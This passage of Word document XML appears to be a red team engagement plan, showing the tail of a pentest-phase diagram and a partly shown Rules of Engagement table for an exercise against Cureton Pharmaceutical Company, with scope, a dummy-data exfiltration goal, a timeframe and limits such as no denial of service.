                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="4FA898A9" w14:textId="77777777" w:rsidR="00701604" w:rsidRPr="00244A04" w:rsidRDefault="00701604" w:rsidP="00A7467C">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t xml:space="preserve">6. Post Exploitation </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:br/>
                              <w:t>(Pivoting, Persistence, Exfiltration)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:roundrect>
                    <v:roundrect id="Rounded Rectangle 36" o:spid="_x0000_s1037" style="position:absolute;left:34107;top:25749;width:19203;height:5486;visibility:visible;mso-wrap-style:square;v-text-anchor:top" arcsize="22300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8qr8A&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE7wv+h/CEva2pLhSpRhFR8Loqnh/Nswk2&#10;L7WJbfXXbxYWPA4z8w2zXA+uFh21wXpWMJ1kIIhLry1XCs6n/dccRIjIGmvPpOBJAdar0ccSC+17&#10;/qHuGCuRIBwKVGBibAopQ2nIYZj4hjh5V986jEm2ldQt9gnuajnLslw6tJwWDDa0NVTejg+noJ5b&#10;PN1DZ/DVP3M6290VLzelPsfDZgEi0hDf4f/2QSv4zuHvS/o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1P7yqvwAAANsAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93bnJl&#10;di54bWxQSwUGAAAAAAQABAD1AAAAhAMAAAAA&#10;" fillcolor="#deeaf6 [660]" strokecolor="#0070c0" strokeweight="1pt">
                      <v:stroke joinstyle="miter"/>
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="11F55C79" w14:textId="77777777" w:rsidR="00701604" w:rsidRPr="00244A04" w:rsidRDefault="00701604" w:rsidP="00A7467C">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t xml:space="preserve">7. Reporting </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:br/>
                              <w:t>(Technical/ Executive reports)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:roundrect>
                    <v:shapetype id="_x0000_t32" coordsize="21600,21600" o:spt="32" o:oned="t" path="m,l21600,21600e" filled="f">
                      <v:path arrowok="t" fillok="f" o:connecttype="none"/>
                      <o:lock v:ext="edit" shapetype="t"/>
                    </v:shapetype>
                    <v:shape id="Straight Arrow Connector 37" o:spid="_x0000_s1038" type="#_x0000_t32" style="position:absolute;left:7853;top:5722;width:0;height:27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NgcUAAADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvYhurNKW1E1Q&#10;QbEIhaqX3h7Z12za7NuQXWP8911B8DjMzDfMPO9tLTpqfeVYwWScgCAunK64VHA8rEdvIHxA1lg7&#10;JgUX8pBnD4M5ptqd+Yu6fShFhLBPUYEJoUml9IUhi37sGuLo/bjWYoiyLaVu8RzhtpbPSfIiLVYc&#10;Fww2tDJU/O1PVgF9rNa78vf72HWbhR1uP5czYqPU02O/eAcRqA/38K291Qqmr3D9En+Az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YNgcUAAADbAAAADwAAAAAAAAAA&#10;AAAAAAChAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA+QAAAJMDAAAAAA==&#10;" strokecolor="#0070c0" strokeweight="3pt">
                      <v:stroke endarrow="block" joinstyle="miter"/>
                    </v:shape>
                    <v:shape id="Straight Arrow Connector 38" o:spid="_x0000_s1039" type="#_x0000_t32" style="position:absolute;left:7797;top:14192;width:0;height:276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mZ88EAAADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPy4rCMBTdC/5DuIIb0dQHw1CNooKD&#10;IgjjuHF3aa5NZ5qb0mRq/XuzEFweznuxam0pGqp94VjBeJSAIM6cLjhXcPnZDT9B+ICssXRMCh7k&#10;YbXsdhaYanfnb2rOIRcxhH2KCkwIVSqlzwxZ9CNXEUfu5mqLIcI6l7rGewy3pZwkyYe0WHBsMFjR&#10;1lD2d/63Cuiw3R3z3+ulab7WdrA/bWbERql+r13PQQRqw1v8cu+1gmkcG7/EHyC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SZnzwQAAANsAAAAPAAAAAAAAAAAAAAAA&#10;AKECAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD5AAAAjwMAAAAA&#10;" strokecolor="#0070c0" strokeweight="3pt">
                      <v:stroke endarrow="block" joinstyle="miter"/>
                    </v:shape>
                    <v:shape id="Straight Arrow Connector 39" o:spid="_x0000_s1040" type="#_x0000_t32" style="position:absolute;left:7517;top:23056;width:0;height:27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U8aMUAAADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvYhurFLa1E1Q&#10;QbEIhaqX3h7Z12za7NuQXWP8911B8DjMzDfMPO9tLTpqfeVYwWScgCAunK64VHA8rEevIHxA1lg7&#10;JgUX8pBnD4M5ptqd+Yu6fShFhLBPUYEJoUml9IUhi37sGuLo/bjWYoiyLaVu8RzhtpbPSfIiLVYc&#10;Fww2tDJU/O1PVgF9rNa78vf72HWbhR1uP5czYqPU02O/eAcRqA/38K291Qqmb3D9En+Az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gU8aMUAAADbAAAADwAAAAAAAAAA&#10;AAAAAAChAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA+QAAAJMDAAAAAA==&#10;" strokecolor="#0070c0" strokeweight="3pt">
                      <v:stroke endarrow="block" joinstyle="miter"/>
                    </v:shape>
                    <v:shape id="Straight Arrow Connector 40" o:spid="_x0000_s1041" type="#_x0000_t32" style="position:absolute;left:43419;top:22944;width:0;height:27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nmiMIAAADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+C/sfwhvsIjZ1yJBqFC10&#10;OAYDay/eHs2z6da8lCar3X+/HAY7fny/t/vJdmKkwbeOFSyTFARx7XTLjYLqUizWIHxA1tg5JgU/&#10;5GG/e5htMdPuzmcay9CIGMI+QwUmhD6T0teGLPrE9cSRu7nBYohwaKQe8B7DbSef0/RFWmw5Nhjs&#10;KTdUf5XfVgG95cV783mtxvH1YOenj+OK2Cj19DgdNiACTeFf/Oc+aQWruD5+iT9A7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znmiMIAAADbAAAADwAAAAAAAAAAAAAA&#10;AAChAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA+QAAAJADAAAAAA==&#10;" strokecolor="#0070c0" strokeweight="3pt">
                      <v:stroke endarrow="block" joinstyle="miter"/>
                    </v:shape>
                    <v:shape id="Straight Arrow Connector 41" o:spid="_x0000_s1042" type="#_x0000_t32" style="position:absolute;left:43363;top:14417;width:0;height:27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VDE8MAAADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE74LfITzBy7KmiixSjaKC&#10;oiwI/rns7dE8m+42L6WJtX57syB4HGbmN8xs0dpSNFT7wrGC4SABQZw5XXCu4HLefE5A+ICssXRM&#10;Ch7kYTHvdmaYanfnIzWnkIsIYZ+iAhNClUrpM0MW/cBVxNG7utpiiLLOpa7xHuG2lKMk+ZIWC44L&#10;BitaG8r+TjergPbrzXf++3Npmu3SfuwOqzGxUarfa5dTEIHa8A6/2jutYDyE/y/xB8j5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B1QxPDAAAA2wAAAA8AAAAAAAAAAAAA&#10;AAAAoQIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPkAAACRAwAAAAA=&#10;" strokecolor="#0070c0" strokeweight="3pt">
                      <v:stroke endarrow="block"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2" o:spid="_x0000_s1043" type="#_x0000_t34" style="position:absolute;left:17334;top:11331;width:16288;height:17431;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ZTfsQAAADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPzYrCQBCE78K+w9DC3nSirCLRUURU&#10;9rIs/uKxzbRJ3ExPyIwa9+kdQfBYVNdXXaNJbQpxpcrllhV02hEI4sTqnFMF282iNQDhPLLGwjIp&#10;uJODyfijMcJY2xuv6Lr2qQgQdjEqyLwvYyldkpFB17YlcfBOtjLog6xSqSu8BbgpZDeK+tJgzqEh&#10;w5JmGSV/64sJb/weZ5ef3mY+39nj3h+S/z0tz0p9NuvpEISn2r+PX+lvreCrC88tAQBy/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9lN+xAAAANsAAAAPAAAAAAAAAAAA&#10;AAAAAKECAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD5AAAAkgMAAAAA&#10;" strokecolor="#0070c0" strokeweight="3pt">
                      <v:stroke endarrow="block"/>
                    </v:shape>
                    <v:shape id="Straight Arrow Connector 46" o:spid="_x0000_s1044" type="#_x0000_t32" style="position:absolute;left:7573;top:31414;width:21;height:323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YtdMMAAADbAAAADwAAAGRycy9kb3ducmV2LnhtbESP3YrCMBSE74V9h3AWvNN0RbR2jbIs&#10;+AOCaNcHODTHNmxzUpqo9e2NIHg5zMw3zHzZ2VpcqfXGsYKvYQKCuHDacKng9LcapCB8QNZYOyYF&#10;d/KwXHz05phpd+MjXfNQighhn6GCKoQmk9IXFVn0Q9cQR+/sWoshyraUusVbhNtajpJkIi0ajgsV&#10;NvRbUfGfX6yCtTlNd8bOZrvDeCNluto36fmiVP+z+/kGEagL7/CrvdUKxhN4fok/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mLXTDAAAA2wAAAA8AAAAAAAAAAAAA&#10;AAAAoQIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPkAAACRAwAAAAA=&#10;" strokecolor="#0070c0" strokeweight="3pt">
                      <v:stroke endarrow="block" joinstyle="miter"/>
                    </v:shape>
                    <v:line id="Straight Connector 47" o:spid="_x0000_s1045" style="position:absolute;flip:y;visibility:visible;mso-wrap-style:square" from="7573,34275" to="43681,34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o4jMQAAADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPzWoCQRCE7wHfYehALkFnIxLNxlHi&#10;EsFLDv48QLPT2V2c6Vm3R928fUYQPBZV9RU1X/beqQt10gQ28DbKQBGXwTZcGTjs18MZKInIFl1g&#10;MvBHAsvF4GmOuQ1X3tJlFyuVICw5GqhjbHOtpazJo4xCS5y839B5jEl2lbYdXhPcOz3OsnftseG0&#10;UGNLRU3lcXf2Bk60/TgW3z+vsnKFHGYunBsJxrw891+foCL18RG+tzfWwGQKty/pB+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yjiMxAAAANsAAAAPAAAAAAAAAAAA&#10;AAAAAKECAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD5AAAAkgMAAAAA&#10;" strokecolor="#0070c0" strokeweight="3pt">
                      <v:stroke joinstyle="miter"/>
                    </v:line>
                    <v:line id="Straight Connector 48" o:spid="_x0000_s1046" style="position:absolute;flip:y;visibility:visible;mso-wrap-style:square" from="43588,31302" to="43639,34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VWs/sAAAADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPzWrCQBC+F3yHZYReim6UUjS6igYL&#10;vfTgzwMM2TEJ7s7GzKrp23cPgseP73+57r1Td+qkCWxgMs5AEZfBNlwZOB2/RzNQEpEtusBk4I8E&#10;1qvB2xJzGx68p/shViqFsORooI6xzbWWsiaPMg4tceLOofMYE+wqbTt8pHDv9DTLvrTHhlNDjS0V&#10;NZWXw80buNJ+fil2vx+ydYWcZi7cGgnGvA/7zQJUpD6+xE/3jzXwmcamL+kH6N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FVrP7AAAAA2wAAAA8AAAAAAAAAAAAAAAAA&#10;oQIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPkAAACOAwAAAAA=&#10;" strokecolor="#0070c0" strokeweight="3pt">
                      <v:stroke joinstyle="miter"/>
                    </v:line>
                  </v:group>
                </v:group>
                <w10:wrap anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="137666BA" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00A7467C"/>
    <w:p w14:paraId="34097062" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00A7467C"/>
    <w:p w14:paraId="64262CE2" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00A7467C"/>
    <w:p w14:paraId="00170D0D" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00A7467C"/>
    <w:p w14:paraId="4B9F3851" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00A7467C"/>
    <w:p w14:paraId="2BF16075" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00A7467C"/>
    <w:p w14:paraId="0F0E2559" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00A7467C"/>
    <w:p w14:paraId="3C4B43E4" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00A7467C"/>
    <w:p w14:paraId="10208CAE" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00A7467C"/>
    <w:p w14:paraId="580A8FA9" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00A7467C"/>
    <w:p w14:paraId="68FA3598" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00A7467C"/>
    <w:p w14:paraId="4653867C" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00A7467C"/>
    <w:p w14:paraId="6141B273" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00A7467C"/>
    <w:p w14:paraId="3EED86C5" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00A7467C"/>
    <w:p w14:paraId="648C19AB" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="00B736C5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc215571134"/>
      <w:r w:rsidRPr="00B736C5">
        <w:lastRenderedPageBreak/>
        <w:t>Rules of Engagement (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B736C5">
        <w:t>RoE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B736C5">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>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36"/>
        <w:gridCol w:w="7734"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B736C5" w14:paraId="6A65DE7D" w14:textId="77777777" w:rsidTr="00B736C5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DC19C72" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRPr="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="008B6D90">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B736C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Element</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="379BADC3" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRPr="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B736C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B736C5" w14:paraId="2E3DA250" w14:textId="77777777" w:rsidTr="00B736C5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61155AA4" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="008B6D90">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Target Organization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B4341BD" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Cureton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Pharmaceutical Company (CPC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B736C5" w14:paraId="5A66510D" w14:textId="77777777" w:rsidTr="00B736C5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D88A8D0" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="008B6D90">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Red Team Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EC0ED8E" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Operation IP Shield</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B6D90" w14:paraId="1FAF24F8" w14:textId="77777777" w:rsidTr="00B736C5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22405237" w14:textId="77777777" w:rsidR="008B6D90" w:rsidRDefault="008B6D90" w:rsidP="008B6D90">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Target Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="189ED070" w14:textId="77777777" w:rsidR="008B6D90" w:rsidRDefault="008B6D90">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r w:rsidRPr="008B6D90">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>In-Scope:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B6D90">
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>On-Premises Active Directory (AD) environment, VPN link to AWS VPC, and AWS EC2 instance hosting the target data (</w:t>
            </w:r>
            <w:r w:rsidRPr="008B6D90">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>Research-Server-01</w:t>
            </w:r>
            <w:r>
              <w:t>), and the associated S3 bucket (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008B6D90">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cpc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008B6D90">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>-research-data-staging</w:t>
            </w:r>
            <w:r>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B6D90" w14:paraId="7862FB88" w14:textId="77777777" w:rsidTr="00B736C5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D29EE20" w14:textId="77777777" w:rsidR="008B6D90" w:rsidRDefault="008B6D90" w:rsidP="008B6D90">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CA105A8" w14:textId="77777777" w:rsidR="008B6D90" w:rsidRDefault="008B6D90">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r w:rsidRPr="008B6D90">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Out-of-Scope:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B6D90">
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Any production manufacturing systems, payroll, HR systems, public-facing website, or any external third-party partner systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B736C5" w14:paraId="59BD153C" w14:textId="77777777" w:rsidTr="00B736C5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08589A34" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="008B6D90">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Success Criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A2071DD" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Successful exfiltration of the dummy research data file (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008B6D90">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>confidential_research_data.json</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>) from the AWS S3 bucket.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B736C5" w14:paraId="4156B0D2" w14:textId="77777777" w:rsidTr="00B736C5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45E4727E" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="008B6D90">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Timeframe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6809217D" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Start: 09:00, 1st April 2026. End: 17:00, 5th April 2026.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B736C5" w14:paraId="0B7FE995" w14:textId="77777777" w:rsidTr="00B736C5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35CA3E28" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="008B6D90">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Boundary Limitations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2ABF6484" w14:textId="2CD388B4" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>NO</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> denial-of-service attacks, resource exhaustion, or other actions causing infrastructure instability or downtime. Use of C2 must be limited to </w:t>
            </w:r>
            <w:r w:rsidR="00D07609">
              <w:t>designating</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IPs only. The Red Team must employ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>stealth</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> as a primary objective.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B736C5" w14:paraId="086D8F85" w14:textId="77777777" w:rsidTr="00B736C5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4530B380" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="008B6D90">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Client POC (White Team)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7862FC14" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
